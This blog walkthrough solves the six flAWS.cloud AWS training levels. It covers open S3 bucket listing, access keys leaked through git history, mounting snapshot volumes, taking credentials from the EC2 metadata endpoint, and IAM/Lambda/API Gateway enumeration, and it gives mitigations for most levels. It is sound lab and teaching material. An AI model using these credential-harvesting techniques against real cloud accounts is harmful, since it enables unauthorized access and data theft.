Sitemap

AWS Pentesting with flAWS.cloud: A step-by-step Walkthrough

7 min readJun 8, 2025

--

flAWS.cloud is an AWS security training platform featuring hands-on challenges that teach you about real-world attack surfaces in the AWS Cloud (along with its mitigation).

Created by Scott Piper, this resource is highly recommended for beginners and professionals alike who are learning AWS pentesting or navigating the landscape of common cloud misconfigurations.

In this writeup, I’m going to present my own approach and step-by-step actions I took to solve the challenges. So let’s dive in!

LEVEL 1

This level requires you to list S3 buckets in the first sub-domain, hence the name buckets of fun.

At first, I used sublist.3r to list all its subdomains. I checked that the first domain listed (4b0cf…), resolves to an EC2 instance (This will come at a later level).

I then realized that flaws.cloud website is static, i.e., this could be an S3 hosted website. Let’s see what the website resolves to.

We see that it resolves to an S3 bucket. Which means this is the first domain. Now, let’s list the bucket

We see an interesting secret file. What does it say?

Congrats, we moved to level 2

How to avoid this?

Never grant access to everyone on the internet to access your data present in the cloud.

Source: flAWS.Cloud by Scott Piper

LEVEL 2

This is similar to Level 1, we have to list the level 2 S3 bucket

Since, we had already listed the subdomains earlier, let’s try to list the bucket with our own AWS account creds. Make sure to set up your AWS CLI.

We see a second secret. Unlike before, this has to be copied to your machine.

How to avoid?

Only allow specific users to access your bucket, not any authenticated AWS user

Source: flAWS.Cloud by Scott Piper

LEVEL 3

This level’s objective is to find the first AWS access key that could let us list other buckets

There’s a .git folder when listing the level 3 bucket, unlike the previous buckets

In my case, I copied all the bucket contents to my system

Let’s investigate git folder

This message reveals that something sensitive was added before the commit. Let’s check the previous commits made

Checkout to the first commit to see if there’s anything we shouldn’t have access to.

And look what we have here! We got the access keys info

Note: Please put the region as us-west-2

Move to a new profile and check if we can access more buckets.

How to avoid?

If keys are accidentally exposed, make sure to rotate your AWS access keys and delete the old keys

LEVEL 4

We know this sub-domain is running EC2 instance, after accessing this domain, we are prompted to enter a username and password. We have to find out the user credentials to access this webpage.

Let us check who we are and what permissions do we have as the new user. And we don’t have permissions to check our permissions. Well…

We are a backup user, so let’s see if we might have permissions for EC2 snapshots

Now, we need to inspect the snapshot. To do this, we’ll launch an EC2 instance, create a volume from the snapshot, and mount it to the /mnt directory on the EC2 instance.

#Create volume
aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

After creating volume, attach the volume to our running instance in the AWS console.

Note: In my case, the volume is /dev/xvdf1

Mount the volume

sudo mount /dev/xvdf1 /mnt

Let’s see what’s in here

We know that the proxy used is Nginx. So, setupNginx.sh looks promising to check out.

These user credentials were used to set up the Nginx proxy. Once we enter these credentials, we can access the webpage.

LEVEL 5

This challenge leads us to investigate the proxy and maybe find some credentials that can list the hidden directory in level 6 bucket

If we know this is an EC2, let’s check if we can get its metadata.

Just like that, we are able to get the security credentials

After configuring with our new credentials, we can list the level 6 bucket and discover the hidden directory

How to avoid it?

Ensure your applications do not allow access to 169.254.169.254 or any local and private IP ranges. Additionally, ensure that IAM roles are restricted as much as possible.

Level 6

In this last challenge, we’re getting access to a new user with security audit permissions

Let’s check the permissions available to us. Two policies are attached: MySecurityAudit and list_apigateways

Let us list what each of these permissions allows us to do. We see that MySecurityAudit policy is overly permissive and allows us to perform actions on every resource

The other policy, as the name suggests, list_apigateways has apigateway:GET permission on the restapis/* resource, which allows us to list all available APIs under the “restapis” endpoint

Out of all the resources, we could assume the lambda functions may reveal something interesting

There is a function named Level 6. What can this function do?

We see that this function can execute the API gateway endpoint. The API ID being s33ppypa75. The lambda function calls the endpoint with Rest API ID, region, stage name and resource name

https://<api-id>.execute-api.<region>.amazonaws.com/<Stage>/<Resource>

So let’s find the stage name

The stage name is Prod. Now that we know all the components, let’s send a curl request to the endpoint and observe the response.

Great! We have completed the last challenge

How to avoid?

Overly permissive policies are an open invitation to data breaches. Therefore, always follow the principle of least privilege, i.e., grant users only the permissions they need to perform specific tasks.

Thanks for Reading!

With this, we’ve completed all challenges. Feel free to share it with others diving into cloud security — and let me know your thoughts or what you’d like to see next!

--

--

Aditya
Aditya

Written by Aditya

Just a tech guy writing about awesomeness I work with

Responses (1)